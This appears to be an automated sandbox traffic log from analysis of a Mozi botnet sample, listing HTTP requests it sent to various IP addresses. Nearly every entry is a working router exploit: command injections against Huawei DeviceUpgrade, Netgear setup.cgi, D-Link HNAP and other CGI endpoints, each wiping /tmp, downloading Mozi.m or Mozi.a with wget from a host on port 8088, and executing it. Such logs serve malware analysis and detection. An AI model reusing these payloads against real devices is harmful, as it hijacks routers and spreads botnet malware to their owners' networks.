                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 91.91.58.110:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 215.15.148.253:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 152.127.1.190:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 120.122.201.49:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 165.72.140.124:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 52.160.156.2:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 110.101.87.191:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 142.69.196.141:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping 